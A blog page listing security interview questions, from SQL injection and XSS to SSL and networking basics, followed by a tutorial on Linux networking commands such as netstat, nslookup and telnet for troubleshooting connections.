145) what is the difference between statistical anomaly detection and rule-based intrusion detection?
146) Describe SOAP and WSDL
147) what protocols comprise SSL?
148) what are hidden fields in HTTP?
149) what steps are involved in the SSL Record Protocol transmission?
150) what is file enumeration?
151) what tools can you use to validate the strength of SID (session ID)?
152) what is phishing attack?
153) what is cookie gathering?
154) what is a dual signature and what is its purpose?
155) how can you ensure that all input fields are properly validated to prevent code injection attacks?
156) why do we need port scanning?
157) what are format string vulnerabilities?
158) Example of broken authentication and command injection
159) what is sql injection?
160) what are fuzzers?
161) what is runtime inspection?
162) what is ISO 17799
163) what is integer overflow?
164) what type of security testing have you performed? 
165) what is ARP spoofing?
166) During an audit, an interviewee is not disclosing the information being requested. How would you overcome this situation? 
167) Why should I use server certificates on my e-commerce website? 
168) Can a server certificate prevent SQL injection attacks against your system? Please explain.
169) What are the most common application security flaws?
170) What do you understand by layered security approach? 
171) Difference between virus, Trojan, spyware, malware and a worm
172) Can Linux be compromised? How secure is Linux? How would you compromise a LINUX system?
173) What do you do if you are a victim of a DoS attack?
174) What is a log host?
175) what are the security functions of SSL?
176) what is a 0 by 90 bytes error.
177) what is the problem of having a predictable sequence of bits in TCP/IP?
178) what is heap memory?
179) what is a system call?
180) what is 2 factor authentication?
181) what is IIS lockdown tool?
182) what is disaster recovery?
183) what is a null session?
184) what is incident management?
185) what is SAM (Security Account Manager)?
186) what is a SID (Security ID)?
187) what is the difference between TCP and IP?
188) what is the difference between TCP and UDP?
189) Explain IP Address?
190) what is Public IP and Private IP?
191) Define subnet mask, default gateway, loopback address and IPID?
192) what is Hypertext Transfer Protocol (HTTP)? What are request methods?
193) Difference between IPv4 and IPv6
194) what is the difference between stateful and stateless protocol? Explain with example?
195) how would you prevent man-in-the-middle attacks?
196) Example, recommendation and affect of DOM based XSS?

197) what is XSP(Cross site printing)?

198) Describe OSPF routing?

199) what are the consequences of HTTP trace request?

200) what is session hijacking?

201) how would you convince a client to use your security product?

202) how do you secure a Wi-Fi network?

203) what is a protocol, socket and port?

204) what is your area of expertise and why?

205) what is the difference between routing protocols and routed protocols?

206) Difference between session and cookie?

Read more ...

Top 10 basic networking commands in linux/unix

Networking is an essential part Unix and it offer lots of tools and command to diagnose any networking problem. When I was working on FIX Protocol we get lot of support queries to see whether FIX Sessions are connected or not. Since FIX Protocol uses sockets you can use net stat , telnet and other networking command available in Linux for finding problem and solve that.In this article I will show you basic networking commands in Unix and for what purpose they are used. with the combination of grep and find command on them you can troubleshoot most of networking problem

Networking Commands Example in Unix and Linux

These are most useful commands in my list while working on Linux server , this enables you to quickly troubleshoot connection issues e.g. whether other system is connected or not , whether other host is responding or not and while working for FIX connectivity for advanced trading system this tools saves quite a lot of time

• finding host/domain name and IP address - hostname
  • test network connection – ping
  • getting network configuration – ifconfig
  • Network connections, routing tables, interface statistics – netstat
  • query DNS lookup name – nslookup
  • communicate with other hostname – telnet
  • outing steps that packets take to get to network host – traceroute
  • view user information – finger
  • checking status of destination host - telnet
  
  

Example of Networking commands in Unix

let's see some example of various networking command in Unix and Linux. Some of them are quite basic e.g. ping and telnet and some are more powerful e.g. nslookup and netstat. When you used these commands in combination of find and grep you can get anything you are looking for e.g. hostname, connection end points, connection status etc.


hostname

hostname with no options displays the machines host name
hostname –ddisplays the domain name the machine belongs to
hostname –fdisplays the fully qualified host and domain name
hostname –idisplays the IP address for the current machine


ping
It sends packets of information to the user-defined source. If the packets are received, the destination device sends packets back. Ping can be used for two purposes

1. To ensure that a network connection can be established.
2. Timing information as to the speed of the connection.

If you do ping www.yahoo.com it will display its IP address. Use ctrl+C to stop the test.

ifconfig
View network configuration, it displays the current network adapter configuration. It is handy to determine if you are getting transmit (TX) or receive (RX) errors.


netstat
Most useful and very versatile for finding connection to and from the host. You can find out all the multicast groups (network) subscribed by this host by issuing "netstat -g"

netstat -nap | grep portwill display process id of application which is using that port
netstat -a or netstat –allwill display all connections including TCP and UDP
netstat --tcp or netstat –twill display only TCP connection
netstat --udp or netstat –uwill display only UDP connection
netstat -gwill display all multicast network subscribed by this host.

nslookup
If you know the IP address it will display hostname. To find all the IP addresses for a given domain name, the command nslookup is used. You must have a connection to the internet for this utility to be useful.
E.g. nslookup blogger.com

You can also use nslookup to convert hostname to IP Address and from IP Address from hostname.

traceroute
A handy utility to view the number of hops and response time to get to a remote system or web site is traceroute. Again you need an internet connection to make use of this tool.


finger
View user information, displays a user’s login name, real name, terminal name and write status. this is pretty old unix command and rarely used now days.

telnet
Connects destination host via telnet protocol, if telnet connection establish on any port means connectivity between two hosts is working fine.
telnet hostname port will telnet hostname with the port specified. Normally it is used to see whether host is alive and network connection is fine or not.

Read more ...